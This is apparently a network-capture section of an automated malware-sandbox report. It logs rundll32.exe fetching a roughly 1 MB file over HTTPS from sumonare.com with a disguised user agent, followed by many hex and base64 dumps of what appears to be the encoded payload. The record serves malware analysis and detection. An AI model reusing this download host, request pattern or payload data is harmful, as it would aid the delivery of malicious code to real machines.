                Data Ascii: LonDsa050WeACWbsL1to0TeQXjuAw3bE+iv8cj848+sN/lfAcsdEzize+dbemwGVqR5Alsc2u8hRl0St37mAY4kb9CW/MPDrF1wy6naGWqqep+fSngiHShxq6/oL+nbWdoZaqp6lgs4cfn1DgAnGxjiLYPFnmF25QKDlMXMUhUeIShbkDzrkCXG5a7S6ZOo5jH/8Ul8S4OqZrNHpRXojliWRBNgFe/xyXF5GwgjRR+pVlsd7ggGj7p4
                2024-09-28 01:22:10 UTC16384INData Raw: 61 34 4f 71 59 6c 4a 72 64 39 33 74 50 0d 0a 64 4c 4b 34 7a 50 51 69 73 63 32 75 38 73 52 35 70 5a 6d 55 37 4c 68 77 6c 62 47 4c 30 50 34 4c 68 38 32 78 75 64 51 78 72 35 4b 6c 37 65 59 70 79 38 65 55 78 7a 46 56 34 67 70 70 39 51 76 71 0d 0a 55 58 6c 52 62 62 4f 64 61 32 55 31 74 66 35 75 69 71 61 55 7a 69 79 6d 78 58 66 46 38 4e 52 56 70 5a 6d 55 37 6e 69 73 36 44 64 67 56 68 31 4c 76 72 64 79 7a 61 36 47 55 47 31 61 5a 6f 42 76 0d 0a 38 72 31 58 73 59 75 6d 61 30 64 35 4d 73 53 6e 62 59 61 75 6b 74 49 7a 67 32 71 44 66 59 50 4c 74 43 31 38 7a 44 53 6d 78 53 50 59 37 50 32 54 70 5a 6e 67 34 4a 6e 47 6c 4c 48 39 33 46 4f 34 0d 0a 68 73 33 46 76 32 6d 47 72 70 4c 54 36 38 4f 62 79 73 64 59 6e 4c 57 37 61 30 54 73 6d 72 44 4e 72 76 44 45 79 61 53 5a 6c 4f
                Data Ascii: a4OqYlJrd93tPdLK4zPQisc2u8sR5pZmU7LhwlbGL0P4Lh82xudQxr5Kl7eYpy8eUxzFV4gpp9QvqUXlRbbOda2U1tf5uiqaUziymxXfF8NRVpZmU7nis6DdgVh1Lvrdyza6GUG1aZoBv8r1XsYuma0d5MsSnbYauktIzg2qDfYPLtC18zDSmxSPY7P2TpZng4JnGlLH93FO4hs3Fv2mGrpLT68ObysdYnLW7a0TsmrDNrvDEyaSZlO
                2024-09-28 01:22:10 UTC16384INData Raw: 62 73 44 67 74 77 73 6f 7a 2f 52 49 34 4d 31 76 6e 57 76 70 70 67 6b 6c 4c 67 54 4d 73 4e 2f 2b 53 69 35 6e 4e 4b 5a 6c 4f 62 78 4d 47 54 34 70 4e 79 35 4d 6d 35 61 57 41 35 52 65 54 6c 64 0d 0a 7a 57 39 37 44 61 57 56 59 6c 36 63 4f 54 42 41 65 62 47 4b 50 70 59 38 6b 57 31 61 5a 6d 76 6f 65 4a 54 69 41 35 44 53 50 71 50 79 4d 4d 64 33 37 66 49 63 69 64 45 7a 71 2b 77 6b 73 79 37 79 0d 0a 2f 52 7a 54 7a 44 53 4b 78 33 2f 6c 76 68 53 52 70 5a 6d 55 6d 72 68 31 77 36 59 73 67 47 74 48 38 6e 66 36 75 52 79 4e 4e 65 52 58 5a 6d 74 6c 4e 62 4f 4f 45 37 65 56 70 34 75 31 2f 6f 4c 2b 0d 0a 42 50 4b 39 37 72 59 69 35 69 44 4b 73 53 36 69 48 6c 6a 6d 43 6f 5a 6a 70 6d 76 36 65 31 48 75 6e 6d 37 69 49 4e 47 31 50 76 4c 39 44 4a 2f 4b 50 4e 37 48 64 37 6e 79 48 49
                Data Ascii: bsDgtwsoz/RI4M1vnWvppgklLgTMsN/+Si5nNKZlObxMGT4pNy5Mm5aWA5ReTldzW97DaWVYl6cOTBAebGKPpY8kW1aZmvoeJTiA5DSPqPyMMd37fIcidEzq+wksy7y/RzTzDSKx3/lvhSRpZmUmrh1w6YsgGtH8nf6uRyNNeRXZmtlNbOOE7eVp4u1/oL+BPK97rYi5iDKsS6iHljmCoZjpmv6e1Hunm7iING1PvL9DJ/KPN7Hd7nyHI
                2024-09-28 01:22:10 UTC16384INData Raw: 4b 61 55 75 50 52 33 70 37 76 55 46 61 36 53 70 65 30 6d 62 62 36 74 42 37 47 4c 70 75 46 46 38 54 50 44 76 7a 6d 47 72 70 4c 54 36 77 2b 61 0d 0a 79 73 66 67 47 33 7a 53 37 69 4f 47 7a 62 47 35 57 66 41 62 61 5a 30 6a 6c 35 72 4b 78 35 54 44 4f 5a 57 44 5a 76 73 77 54 6a 33 6e 4c 4a 30 2f 31 79 75 2f 6a 54 48 69 61 55 37 2f 48 47 4f 75 0d 0a 6b 7a 5a 4f 4d 74 6f 38 6f 65 36 61 59 75 4c 67 56 63 65 55 73 63 31 64 61 30 64 35 57 5a 2f 4e 32 76 77 78 6b 71 57 5a 61 44 55 78 73 66 34 53 69 36 61 55 7a 50 52 75 73 63 32 75 2b 6d 68 74 0d 0a 4c 77 53 74 49 4e 30 34 72 4d 73 67 70 70 53 34 65 54 4a 4f 4d 74 77 73 75 65 54 50 50 70 53 61 79 72 4d 75 52 76 2f 55 4d 37 69 47 7a 63 51 6a 32 57 6e 63 36 41 36 5a 6c 4a 71 38 76 54 75 78 0d 0a 69 36 62 67 43 6e 47 35
                Data Ascii: KaUuPR3p7vUFa6Spe0mbb6tB7GLpuFF8TPDvzmGrpLT6w+aysfgG3zS7iOGzbG5WfAbaZ0jl5rKx5TDOZWDZvswTj3nLJ0/1yu/jTHiaU7/HGOukzZOMto8oe6aYuLgVceUsc1da0d5WZ/N2vwxkqWZaDUxsf4Si6aUzPRusc2u+mhtLwStIN04rMsgppS4eTJOMtwsueTPPpSayrMuRv/UM7iGzcQj2Wnc6A6ZlJq8vTuxi6bgCnG5
                2024-09-28 01:22:10 UTC16384INData Raw: 59 46 76 54 6e 52 5a 41 4a 61 47 75 51 76 32 55 69 6c 56 35 41 2b 6d 34 43 6a 31 73 33 72 48 0d 0a 49 65 58 67 41 73 57 79 64 6a 41 6b 63 4a 59 6f 67 6d 64 72 5a 54 58 54 62 49 6b 78 67 57 74 48 65 54 4c 45 66 34 6e 78 48 4a 39 56 30 44 36 58 73 4f 6f 65 45 66 38 63 6c 38 53 35 4e 73 64 33 0d 0a 36 63 42 56 62 56 70 6d 41 4c 54 4b 73 79 37 32 64 77 6c 76 7a 69 79 47 78 58 2f 6c 38 6b 44 6b 44 39 62 67 49 49 57 34 55 30 38 42 55 4b 77 43 72 54 4e 4f 4d 6c 47 53 56 71 6f 66 73 6d 74 6c 0d 0a 4e 54 6a 68 41 36 44 52 4a 72 5a 32 68 42 76 44 31 4b 73 6b 65 6a 4a 6e 65 57 55 31 55 46 76 5a 66 55 6b 44 37 38 6f 37 58 74 71 34 68 46 64 74 32 61 4a 6e 37 6e 6a 45 36 49 39 77 30 43 62 72 0d 0a 77 7a 5a 4f 4d 6c 45 53 6b 35 4c 52 4b 38 64 6d 64 44 7a 69 43 39 7a 53
                Data Ascii: YFvTnRZAJaGuQv2UilV5A+m4Cj1s3rHIeXgAsWydjAkcJYogmdrZTXTbIkxgWtHeTLEf4nxHJ9V0D6XsOoeEf8cl8S5Nsd36cBVbVpmALTKsy72dwlvziyGxX/l8kDkD9bgIIW4U08BUKwCrTNOMlGSVqofsmtlNTjhA6DRJrZ2hBvD1KskejJneWU1UFvZfUkD78o7Xtq4hFdt2aJn7njE6I9w0CbrwzZOMlESk5LRK8dmdDziC9zS
                2024-09-28 01:22:10 UTC16384INData Raw: 4a 6d 55 6f 33 44 45 66 4d 55 35 71 65 69 47 0d 0a 4f 62 6c 66 75 38 51 74 72 4a 4b 6c 37 53 70 68 76 4c 30 7a 73 34 75 6d 34 41 35 78 75 38 4e 75 72 49 61 75 34 4d 38 79 6c 70 72 4b 73 66 34 61 69 71 61 55 7a 50 78 71 73 4d 32 75 4b 64 72 67 0d 0a 44 70 69 55 6d 6d 52 53 44 73 50 68 66 5a 4b 34 68 6d 43 6d 72 77 70 37 55 65 36 65 64 75 4c 67 5a 63 61 55 73 66 2f 63 4f 37 6d 47 7a 63 65 33 46 59 65 75 6b 70 77 6a 6c 33 32 34 74 66 4f 30 0d 0a 69 36 59 36 7a 44 54 43 7a 66 4e 68 6b 55 4d 53 58 6d 62 69 34 48 6e 47 6c 4c 48 2f 7a 43 65 35 68 73 33 48 70 78 47 48 72 70 4b 63 49 35 64 38 76 6e 32 62 7a 62 51 5a 34 45 2f 77 76 37 72 4f 0d 0a 72 6f 62 61 50 56 37 76 2f 70 33 4a 78 35 54 46 4e 46 48 69 77 6f 58 4f 73 63 33 63 39 4b 57 52 70 5a 6e 69 36 48 33 47
                Data Ascii: JmUo3DEfMU5qeiGOblfu8QtrJKl7SphvL0zs4um4A5xu8NurIau4M8ylprKsf4aiqaUzPxqsM2uKdrgDpiUmmRSDsPhfZK4hmCmrwp7Ue6eduLgZcaUsf/cO7mGzce3FYeukpwjl324tfO0i6Y6zDTCzfNhkUMSXmbi4HnGlLH/zCe5hs3HpxGHrpKcI5d8vn2bzbQZ4E/wv7rOrobaPV7v/p3Jx5TFNFHiwoXOsc3c9KWRpZni6H3G
                2024-09-28 01:22:10 UTC16384INData Raw: 0a 42 50 4b 39 37 72 5a 79 34 69 6a 4a 73 79 36 79 2f 52 79 66 7a 44 54 47 78 33 2b 70 38 67 53 56 6e 57 52 72 5a 54 55 34 34 41 75 4d 6e 69 74 44 65 54 4a 4f 4d 74 6f 30 58 65 51 58 6c 75 41 77 0d 0a 50 62 45 2b 6f 76 38 63 6d 78 66 79 66 36 4a 6a 32 6a 53 74 68 66 61 45 6c 5a 71 2b 66 5a 66 46 6b 51 53 70 54 33 6e 2b 67 76 34 45 38 72 33 75 74 6e 72 69 4b 4d 47 7a 4c 72 72 39 48 49 50 4b 0d 0a 4e 4d 33 48 66 37 33 79 42 49 46 56 30 47 6e 74 63 4d 44 67 41 35 7a 51 4a 71 50 79 5a 36 71 37 42 49 6e 61 4b 4b 71 68 61 32 55 31 4f 47 76 46 4f 61 6d 73 42 6e 30 79 54 6a 4a 52 38 68 79 5a 0d 0a 73 6f 33 48 5a 44 57 7a 4c 72 72 2f 76 44 61 45 74 66 36 43 2f 67 54 79 76 65 36 32 65 75 49 6f 77 66 38 75 6f 6e 52 5a 61 30 66 79 64 30 5a 69 33 44 53 31 50 4c 4a 56
                Data Ascii: BPK97rZy4ijJsy6y/RyfzDTGx3+p8gSVnWRrZTU44AuMnitDeTJOMto0XeQXluAwPbE+ov8cmxfyf6Jj2jSthfaElZq+fZfFkQSpT3n+gv4E8r3utnriKMGzLrr9HIPKNM3Hf73yBIFV0GntcMDgA5zQJqPyZ6q7BInaKKqha2U1OGvFOamsBn0yTjJR8hyZso3HZDWzLrr/vDaEtf6C/gTyve62euIowf8uonRZa0fyd0Zi3DS1PLJV
                2024-09-28 01:22:10 UTC16384INData Raw: 48 65 62 67 4c 6a 72 6a 69 55 57 31 61 6a 2f 39 6c 4e 54 6a 72 4d 34 64 66 48 67 4c 35 54 37 77 33 4a 45 62 61 49 46 4c 74 50 6d 6d 38 64 64 50 48 0d 0a 49 65 33 67 41 73 47 35 41 34 62 61 4b 56 6c 57 43 32 34 65 63 72 35 39 30 38 55 35 37 65 41 58 64 51 6b 66 50 69 52 77 6c 69 6a 71 5a 32 74 6c 4e 64 4e 73 69 54 48 70 61 30 64 35 4d 73 52 33 0d 0a 34 5a 49 63 68 68 50 6d 46 70 59 77 54 53 6a 4f 43 61 74 74 4d 6b 53 35 43 7a 72 61 4e 46 33 6b 48 38 72 69 4b 4a 32 7a 50 75 4c 2f 48 4d 50 4d 4d 7a 70 31 65 6c 6b 4d 52 75 59 50 79 75 41 67 0d 0a 6e 62 4d 68 51 6b 38 52 5a 7a 4a 77 39 51 75 57 55 48 6c 52 62 62 46 68 72 43 43 52 4f 47 74 4f 64 4e 4d 75 34 35 49 77 66 50 4c 61 4e 4b 55 4a 30 32 74 72 5a 54 55 34 34 4b 73 70 6d 67 33 58 0d 0a 73 5a 42 50 49 76
                Data Ascii: HebgLjrjiUW1aj/9lNTjrM4dfHgL5T7w3JEbaIFLtPmm8ddPHIe3gAsG5A4baKVlWC24ecr5908U57eAXdQkfPiRwlijqZ2tlNdNsiTHpa0d5MsR34ZIchhPmFpYwTSjOCattMkS5CzraNF3kH8riKJ2zPuL/HMPMMzp1elkMRuYPyuAgnbMhQk8RZzJw9QuWUHlRbbFhrCCROGtOdNMu45IwfPLaNKUJ02trZTU44Kspmg3XsZBPIv


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.749701194.67.193.124437524C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-09-28 01:22:09 UTC114OUTGET /projects/index.aspx HTTP/1.1
                User-Agent: Microsoft-WNS/11.0
                Host: sumonare.com
                Cache-Control: no-cache
                2024-09-28 01:22:09 UTC253INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:09 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Thu, 22 Aug 2024 19:01:47 GMT
                ETag: "f8302-6204a4a61cd40"
                Accept-Ranges: bytes
                Content-Length: 1016578
                Connection: close
                2024-09-28 01:22:09 UTC7939INData Raw: 4e 47 6a 65 4d 6c 4a 35 55 57 31 65 5a 6d 74 6c 79 73 64 72 54 73 78 5a 61 30 64 35 4d 6b 34 79 45 58 6c 52 62 56 70 6d 61 32 55 31 4f 47 74 4f 64 46 6c 72 52 33 6b 79 54 6a 4a 52 65 56 46 74 0d 0a 57 6d 5a 72 5a 54 55 34 61 30 35 30 57 57 74 48 61 54 4e 4f 4d 6c 39 6d 36 32 4e 61 30 6d 4b 6f 46 49 42 71 41 72 6c 34 50 79 38 51 51 57 35 43 49 78 59 32 48 7a 73 4c 53 77 5a 55 56 67 55 68 0d 0a 41 48 6b 4a 49 6c 6c 41 4f 31 78 78 45 44 39 4e 48 69 6b 34 52 56 68 58 44 79 74 61 56 47 5a 4e 58 54 4a 4f 4d 6c 46 35 55 57 33 6a 33 6f 31 4e 79 4f 48 6a 4e 59 6d 41 34 7a 79 45 36 38 5a 4a 0d 0a 66 39 4c 61 46 36 79 2f 34 78 34 62 6b 2b 59 30 4b 49 44 6a 50 49 4a 71 77 6b 69 38 6f 4e 6b 57 6f 54 37 67 48 39 37 68 34 7a 56 61 38 75 63 39 6b 75 76 47 53 61 6f 68 33
                Data Ascii: NGjeMlJ5UW1eZmtlysdrTsxZa0d5Mk4yEXlRbVpma2U1OGtOdFlrR3kyTjJReVFtWmZrZTU4a050WWtHaTNOMl9m62Na0mKoFIBqArl4Py8QQW5CIxY2HzsLSwZUVgUhAHkJIllAO1xxED9NHik4RVhXDytaVGZNXTJOMlF5UW3j3o1NyOHjNYmA4zyE68ZJf9LaF6y/4x4bk+Y0KIDjPIJqwki8oNkWoT7gH97h4zVa8uc9kuvGSaoh3
                2024-09-28 01:22:09 UTC16384INData Raw: 69 54 2f 30 59 62 38 34 34 4f 73 56 6e 72 62 34 54 61 56 74 6d 61 32 57 2b 66 5a 65 4a 4e 46 46 71 52 33 6b 79 78 58 2b 74 76 6c 44 52 0d 0a 37 6d 39 37 37 6d 41 30 34 68 75 63 30 69 35 50 38 48 65 71 75 52 79 46 30 71 78 57 37 79 61 4a 76 6d 32 48 78 79 47 68 34 41 4b 52 75 77 76 53 32 6a 53 31 35 42 65 36 34 44 44 56 73 32 6e 48 0d 0a 4d 59 48 67 43 71 57 35 58 37 73 45 6a 64 6f 6f 6f 71 46 72 6f 61 4d 78 65 38 55 35 6f 61 78 47 55 61 56 48 49 74 6f 73 71 65 59 66 6b 75 49 6e 4d 62 73 57 75 6e 51 73 59 6f 41 38 77 6b 34 79 0d 0a 55 58 6d 36 5a 4e 45 72 6e 32 5a 34 34 4f 49 44 68 4e 49 2b 76 2f 4a 33 76 72 73 54 63 64 6f 6f 70 75 32 4f 4f 50 63 77 61 34 49 68 30 6f 66 45 6c 53 62 48 66 36 33 79 46 4a 47 63 5a 6d 74 57 0d 0a 2f 4c 4d 2b 73 76 65 62 59 38
                Data Ascii: iT/0Yb844OsVnrb4TaVtma2W+fZeJNFFqR3kyxX+tvlDR7m977mA04huc0i5P8HequRyF0qxW7yaJvm2HxyGh4AKRuwvS2jS15Be64DDVs2nHMYHgCqW5X7sEjdoooqFroaMxe8U5oaxGUaVHItosqeYfkuInMbsWunQsYoA8wk4yUXm6ZNErn2Z44OIDhNI+v/J3vrsTcdoopu2OOPcwa4Ih0ofElSbHf63yFJGcZmtW/LM+svebY8
                2024-09-28 01:22:09 UTC16384INData Raw: 4c 6f 6e 44 73 61 30 35 30 57 65 41 43 57 62 73 4c 31 74 6f 30 54 65 51 58 6a 75 41 77 0d 0a 33 62 45 2b 69 76 38 63 6a 38 34 38 2b 73 4e 2f 6c 66 41 63 73 64 45 7a 69 7a 65 2b 64 62 65 6d 77 47 56 71 52 35 41 6c 73 63 32 75 38 68 52 6c 30 53 74 33 37 6d 41 59 34 6b 62 39 43 57 2f 4d 0d 0a 50 44 72 46 31 77 79 36 6e 61 47 57 71 71 65 70 2b 66 53 6e 67 69 48 53 68 78 71 36 2f 6f 4c 2b 6e 62 57 64 6f 5a 61 71 70 36 6c 67 73 34 63 66 6e 31 44 67 41 6e 47 78 6a 69 4c 59 50 46 6e 6d 0d 0a 46 32 35 51 4b 44 6c 4d 58 4d 55 68 55 65 49 53 68 62 6b 44 7a 72 6b 43 58 47 35 61 37 53 36 5a 4f 6f 35 6a 48 2f 38 55 6c 38 53 34 4f 71 5a 72 4e 48 70 52 58 6f 6a 6c 69 57 52 42 4e 67 46 65 0d 0a 2f 78 79 58 46 35 47 77 67 6a 52 52 2b 70 56 6c 73 64 37 67 67 47 6a 37 70 34
                Data Ascii: LonDsa050WeACWbsL1to0TeQXjuAw3bE+iv8cj848+sN/lfAcsdEzize+dbemwGVqR5Alsc2u8hRl0St37mAY4kb9CW/MPDrF1wy6naGWqqep+fSngiHShxq6/oL+nbWdoZaqp6lgs4cfn1DgAnGxjiLYPFnmF25QKDlMXMUhUeIShbkDzrkCXG5a7S6ZOo5jH/8Ul8S4OqZrNHpRXojliWRBNgFe/xyXF5GwgjRR+pVlsd7ggGj7p4
                2024-09-28 01:22:09 UTC16384INData Raw: 61 34 4f 71 59 6c 4a 72 64 39 33 74 50 0d 0a 64 4c 4b 34 7a 50 51 69 73 63 32 75 38 73 52 35 70 5a 6d 55 37 4c 68 77 6c 62 47 4c 30 50 34 4c 68 38 32 78 75 64 51 78 72 35 4b 6c 37 65 59 70 79 38 65 55 78 7a 46 56 34 67 70 70 39 51 76 71 0d 0a 55 58 6c 52 62 62 4f 64 61 32 55 31 74 66 35 75 69 71 61 55 7a 69 79 6d 78 58 66 46 38 4e 52 56 70 5a 6d 55 37 6e 69 73 36 44 64 67 56 68 31 4c 76 72 64 79 7a 61 36 47 55 47 31 61 5a 6f 42 76 0d 0a 38 72 31 58 73 59 75 6d 61 30 64 35 4d 73 53 6e 62 59 61 75 6b 74 49 7a 67 32 71 44 66 59 50 4c 74 43 31 38 7a 44 53 6d 78 53 50 59 37 50 32 54 70 5a 6e 67 34 4a 6e 47 6c 4c 48 39 33 46 4f 34 0d 0a 68 73 33 46 76 32 6d 47 72 70 4c 54 36 38 4f 62 79 73 64 59 6e 4c 57 37 61 30 54 73 6d 72 44 4e 72 76 44 45 79 61 53 5a 6c 4f
                Data Ascii: a4OqYlJrd93tPdLK4zPQisc2u8sR5pZmU7LhwlbGL0P4Lh82xudQxr5Kl7eYpy8eUxzFV4gpp9QvqUXlRbbOda2U1tf5uiqaUziymxXfF8NRVpZmU7nis6DdgVh1Lvrdyza6GUG1aZoBv8r1XsYuma0d5MsSnbYauktIzg2qDfYPLtC18zDSmxSPY7P2TpZng4JnGlLH93FO4hs3Fv2mGrpLT68ObysdYnLW7a0TsmrDNrvDEyaSZlO
                2024-09-28 01:22:10 UTC16384INData Raw: 62 73 44 67 74 77 73 6f 7a 2f 52 49 34 4d 31 76 6e 57 76 70 70 67 6b 6c 4c 67 54 4d 73 4e 2f 2b 53 69 35 6e 4e 4b 5a 6c 4f 62 78 4d 47 54 34 70 4e 79 35 4d 6d 35 61 57 41 35 52 65 54 6c 64 0d 0a 7a 57 39 37 44 61 57 56 59 6c 36 63 4f 54 42 41 65 62 47 4b 50 70 59 38 6b 57 31 61 5a 6d 76 6f 65 4a 54 69 41 35 44 53 50 71 50 79 4d 4d 64 33 37 66 49 63 69 64 45 7a 71 2b 77 6b 73 79 37 79 0d 0a 2f 52 7a 54 7a 44 53 4b 78 33 2f 6c 76 68 53 52 70 5a 6d 55 6d 72 68 31 77 36 59 73 67 47 74 48 38 6e 66 36 75 52 79 4e 4e 65 52 58 5a 6d 74 6c 4e 62 4f 4f 45 37 65 56 70 34 75 31 2f 6f 4c 2b 0d 0a 42 50 4b 39 37 72 59 69 35 69 44 4b 73 53 36 69 48 6c 6a 6d 43 6f 5a 6a 70 6d 76 36 65 31 48 75 6e 6d 37 69 49 4e 47 31 50 76 4c 39 44 4a 2f 4b 50 4e 37 48 64 37 6e 79 48 49
                Data Ascii: bsDgtwsoz/RI4M1vnWvppgklLgTMsN/+Si5nNKZlObxMGT4pNy5Mm5aWA5ReTldzW97DaWVYl6cOTBAebGKPpY8kW1aZmvoeJTiA5DSPqPyMMd37fIcidEzq+wksy7y/RzTzDSKx3/lvhSRpZmUmrh1w6YsgGtH8nf6uRyNNeRXZmtlNbOOE7eVp4u1/oL+BPK97rYi5iDKsS6iHljmCoZjpmv6e1Hunm7iING1PvL9DJ/KPN7Hd7nyHI
                2024-09-28 01:22:10 UTC16384INData Raw: 4b 61 55 75 50 52 33 70 37 76 55 46 61 36 53 70 65 30 6d 62 62 36 74 42 37 47 4c 70 75 46 46 38 54 50 44 76 7a 6d 47 72 70 4c 54 36 77 2b 61 0d 0a 79 73 66 67 47 33 7a 53 37 69 4f 47 7a 62 47 35 57 66 41 62 61 5a 30 6a 6c 35 72 4b 78 35 54 44 4f 5a 57 44 5a 76 73 77 54 6a 33 6e 4c 4a 30 2f 31 79 75 2f 6a 54 48 69 61 55 37 2f 48 47 4f 75 0d 0a 6b 7a 5a 4f 4d 74 6f 38 6f 65 36 61 59 75 4c 67 56 63 65 55 73 63 31 64 61 30 64 35 57 5a 2f 4e 32 76 77 78 6b 71 57 5a 61 44 55 78 73 66 34 53 69 36 61 55 7a 50 52 75 73 63 32 75 2b 6d 68 74 0d 0a 4c 77 53 74 49 4e 30 34 72 4d 73 67 70 70 53 34 65 54 4a 4f 4d 74 77 73 75 65 54 50 50 70 53 61 79 72 4d 75 52 76 2f 55 4d 37 69 47 7a 63 51 6a 32 57 6e 63 36 41 36 5a 6c 4a 71 38 76 54 75 78 0d 0a 69 36 62 67 43 6e 47 35
                Data Ascii: KaUuPR3p7vUFa6Spe0mbb6tB7GLpuFF8TPDvzmGrpLT6w+aysfgG3zS7iOGzbG5WfAbaZ0jl5rKx5TDOZWDZvswTj3nLJ0/1yu/jTHiaU7/HGOukzZOMto8oe6aYuLgVceUsc1da0d5WZ/N2vwxkqWZaDUxsf4Si6aUzPRusc2u+mhtLwStIN04rMsgppS4eTJOMtwsueTPPpSayrMuRv/UM7iGzcQj2Wnc6A6ZlJq8vTuxi6bgCnG5
                2024-09-28 01:22:10 UTC16384INData Raw: 59 46 76 54 6e 52 5a 41 4a 61 47 75 51 76 32 55 69 6c 56 35 41 2b 6d 34 43 6a 31 73 33 72 48 0d 0a 49 65 58 67 41 73 57 79 64 6a 41 6b 63 4a 59 6f 67 6d 64 72 5a 54 58 54 62 49 6b 78 67 57 74 48 65 54 4c 45 66 34 6e 78 48 4a 39 56 30 44 36 58 73 4f 6f 65 45 66 38 63 6c 38 53 35 4e 73 64 33 0d 0a 36 63 42 56 62 56 70 6d 41 4c 54 4b 73 79 37 32 64 77 6c 76 7a 69 79 47 78 58 2f 6c 38 6b 44 6b 44 39 62 67 49 49 57 34 55 30 38 42 55 4b 77 43 72 54 4e 4f 4d 6c 47 53 56 71 6f 66 73 6d 74 6c 0d 0a 4e 54 6a 68 41 36 44 52 4a 72 5a 32 68 42 76 44 31 4b 73 6b 65 6a 4a 6e 65 57 55 31 55 46 76 5a 66 55 6b 44 37 38 6f 37 58 74 71 34 68 46 64 74 32 61 4a 6e 37 6e 6a 45 36 49 39 77 30 43 62 72 0d 0a 77 7a 5a 4f 4d 6c 45 53 6b 35 4c 52 4b 38 64 6d 64 44 7a 69 43 39 7a 53
                Data Ascii: YFvTnRZAJaGuQv2UilV5A+m4Cj1s3rHIeXgAsWydjAkcJYogmdrZTXTbIkxgWtHeTLEf4nxHJ9V0D6XsOoeEf8cl8S5Nsd36cBVbVpmALTKsy72dwlvziyGxX/l8kDkD9bgIIW4U08BUKwCrTNOMlGSVqofsmtlNTjhA6DRJrZ2hBvD1KskejJneWU1UFvZfUkD78o7Xtq4hFdt2aJn7njE6I9w0CbrwzZOMlESk5LRK8dmdDziC9zS
                2024-09-28 01:22:10 UTC16384INData Raw: 4a 6d 55 6f 33 44 45 66 4d 55 35 71 65 69 47 0d 0a 4f 62 6c 66 75 38 51 74 72 4a 4b 6c 37 53 70 68 76 4c 30 7a 73 34 75 6d 34 41 35 78 75 38 4e 75 72 49 61 75 34 4d 38 79 6c 70 72 4b 73 66 34 61 69 71 61 55 7a 50 78 71 73 4d 32 75 4b 64 72 67 0d 0a 44 70 69 55 6d 6d 52 53 44 73 50 68 66 5a 4b 34 68 6d 43 6d 72 77 70 37 55 65 36 65 64 75 4c 67 5a 63 61 55 73 66 2f 63 4f 37 6d 47 7a 63 65 33 46 59 65 75 6b 70 77 6a 6c 33 32 34 74 66 4f 30 0d 0a 69 36 59 36 7a 44 54 43 7a 66 4e 68 6b 55 4d 53 58 6d 62 69 34 48 6e 47 6c 4c 48 2f 7a 43 65 35 68 73 33 48 70 78 47 48 72 70 4b 63 49 35 64 38 76 6e 32 62 7a 62 51 5a 34 45 2f 77 76 37 72 4f 0d 0a 72 6f 62 61 50 56 37 76 2f 70 33 4a 78 35 54 46 4e 46 48 69 77 6f 58 4f 73 63 33 63 39 4b 57 52 70 5a 6e 69 36 48 33 47
                Data Ascii: JmUo3DEfMU5qeiGOblfu8QtrJKl7SphvL0zs4um4A5xu8NurIau4M8ylprKsf4aiqaUzPxqsM2uKdrgDpiUmmRSDsPhfZK4hmCmrwp7Ue6eduLgZcaUsf/cO7mGzce3FYeukpwjl324tfO0i6Y6zDTCzfNhkUMSXmbi4HnGlLH/zCe5hs3HpxGHrpKcI5d8vn2bzbQZ4E/wv7rOrobaPV7v/p3Jx5TFNFHiwoXOsc3c9KWRpZni6H3G
                2024-09-28 01:22:10 UTC16384INData Raw: 0a 42 50 4b 39 37 72 5a 79 34 69 6a 4a 73 79 36 79 2f 52 79 66 7a 44 54 47 78 33 2b 70 38 67 53 56 6e 57 52 72 5a 54 55 34 34 41 75 4d 6e 69 74 44 65 54 4a 4f 4d 74 6f 30 58 65 51 58 6c 75 41 77 0d 0a 50 62 45 2b 6f 76 38 63 6d 78 66 79 66 36 4a 6a 32 6a 53 74 68 66 61 45 6c 5a 71 2b 66 5a 66 46 6b 51 53 70 54 33 6e 2b 67 76 34 45 38 72 33 75 74 6e 72 69 4b 4d 47 7a 4c 72 72 39 48 49 50 4b 0d 0a 4e 4d 33 48 66 37 33 79 42 49 46 56 30 47 6e 74 63 4d 44 67 41 35 7a 51 4a 71 50 79 5a 36 71 37 42 49 6e 61 4b 4b 71 68 61 32 55 31 4f 47 76 46 4f 61 6d 73 42 6e 30 79 54 6a 4a 52 38 68 79 5a 0d 0a 73 6f 33 48 5a 44 57 7a 4c 72 72 2f 76 44 61 45 74 66 36 43 2f 67 54 79 76 65 36 32 65 75 49 6f 77 66 38 75 6f 6e 52 5a 61 30 66 79 64 30 5a 69 33 44 53 31 50 4c 4a 56
                Data Ascii: BPK97rZy4ijJsy6y/RyfzDTGx3+p8gSVnWRrZTU44AuMnitDeTJOMto0XeQXluAwPbE+ov8cmxfyf6Jj2jSthfaElZq+fZfFkQSpT3n+gv4E8r3utnriKMGzLrr9HIPKNM3Hf73yBIFV0GntcMDgA5zQJqPyZ6q7BInaKKqha2U1OGvFOamsBn0yTjJR8hyZso3HZDWzLrr/vDaEtf6C/gTyve62euIowf8uonRZa0fyd0Zi3DS1PLJV
                2024-09-28 01:22:10 UTC16384INData Raw: 48 65 62 67 4c 6a 72 6a 69 55 57 31 61 6a 2f 39 6c 4e 54 6a 72 4d 34 64 66 48 67 4c 35 54 37 77 33 4a 45 62 61 49 46 4c 74 50 6d 6d 38 64 64 50 48 0d 0a 49 65 33 67 41 73 47 35 41 34 62 61 4b 56 6c 57 43 32 34 65 63 72 35 39 30 38 55 35 37 65 41 58 64 51 6b 66 50 69 52 77 6c 69 6a 71 5a 32 74 6c 4e 64 4e 73 69 54 48 70 61 30 64 35 4d 73 52 33 0d 0a 34 5a 49 63 68 68 50 6d 46 70 59 77 54 53 6a 4f 43 61 74 74 4d 6b 53 35 43 7a 72 61 4e 46 33 6b 48 38 72 69 4b 4a 32 7a 50 75 4c 2f 48 4d 50 4d 4d 7a 70 31 65 6c 6b 4d 52 75 59 50 79 75 41 67 0d 0a 6e 62 4d 68 51 6b 38 52 5a 7a 4a 77 39 51 75 57 55 48 6c 52 62 62 46 68 72 43 43 52 4f 47 74 4f 64 4e 4d 75 34 35 49 77 66 50 4c 61 4e 4b 55 4a 30 32 74 72 5a 54 55 34 34 4b 73 70 6d 67 33 58 0d 0a 73 5a 42 50 49 76
